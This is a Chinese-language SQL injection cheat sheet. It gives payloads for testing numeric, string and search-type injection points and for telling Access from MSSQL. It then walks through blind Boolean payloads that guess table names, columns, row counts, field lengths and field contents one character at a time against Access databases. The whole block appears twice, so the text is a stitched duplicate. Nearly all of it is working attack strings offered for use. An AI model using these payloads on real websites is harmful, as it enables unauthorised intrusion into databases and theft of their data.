检测注入类型:
1.数字型
and 1=1 //返回正常页面
and 1=2 //返回错误页面或者和1=1返回的页面不同
2.字符型
' and 1=1 and ''=' //返回正常页面
' and 1=2 and ''=' //返回错误页面或者和1=1返回的页面不同
3.搜索型
%' and 1=1 and '%'='% //返回正常页面
%' and 1=2 and '%'='% //返回错误页面或者和1=1返回的页面不同
检测数据库类型:
and exists (select * from sysobjects) //数据库判断,报错则为ACCESS,正常显示为MSSQL
and exists (select * from msysobjects) //验证IIS错误提示
ACCESS数据库注射:
1.猜表
and exists (select * from [表名])
2.猜字段
and exists (select [字段名] from [表名])
3.猜表中的记录数
and (select Count(1) from [表名] where 1=1) between num1 and num2
4.猜字段名长度
and (select top 1 len([字段名1]) from (Select Top 1 [字段名1],[字段名2],...,[字段名n] from [表名] where 1=1 order by [字段名1],[字段名2],...,[字段名n]) T Order by [字段名1] desc,[字段名2] desc,...,[字段名n] desc ) between num1 and num2
5.猜字段名内容
and (select top 1 asc(mid(cstr(字段名1),1,1)) from (Select Top 1 [字段名1],[字段名2],...,[字段名n] from [表名] where 1=1 order by [字段名1],[字段名2],...,[字段名n]) T Order by [字段名1] desc,[字段名2] desc,...,[字段名n] desc ) between num1 and num2
1.数字型
and 1=1 //返回正常页面
and 1=2 //返回错误页面或者和1=1返回的页面不同
2.字符型
' and 1=1 and ''=' //返回正常页面
' and 1=2 and ''=' //返回错误页面或者和1=1返回的页面不同
3.搜索型
%' and 1=1 and '%'='% //返回正常页面
%' and 1=2 and '%'='% //返回错误页面或者和1=1返回的页面不同
检测数据库类型:
and exists (select * from sysobjects) //数据库判断,报错则为ACCESS,正常显示为MSSQL
and exists (select * from msysobjects) //验证IIS错误提示
ACCESS数据库注射:
1.猜表
and exists (select * from [表名])
2.猜字段
and exists (select [字段名] from [表名])
3.猜表中的记录数
and (select Count(1) from [表名] where 1=1) between num1 and num2
4.猜字段名长度
and (select top 1 len([字段名1]) from (Select Top 1 [字段名1],[字段名2],...,[字段名n] from [表名] where 1=1 order by [字段名1],[字段名2],...,[字段名n]) T Order by [字段名1] desc,[字段名2] desc,...,[字段名n] desc ) between num1 and num2
5.猜字段名内容
and (select top 1 asc(mid(cstr(字段名1),1,1)) from (Select Top 1 [字段名1],[字段名2],...,[字段名n] from [表名] where 1=1 order by [字段名1],[字段名2],...,[字段名n]) T Order by [字段名1] desc,[字段名2] desc,...,[字段名n] desc ) between num1 and num2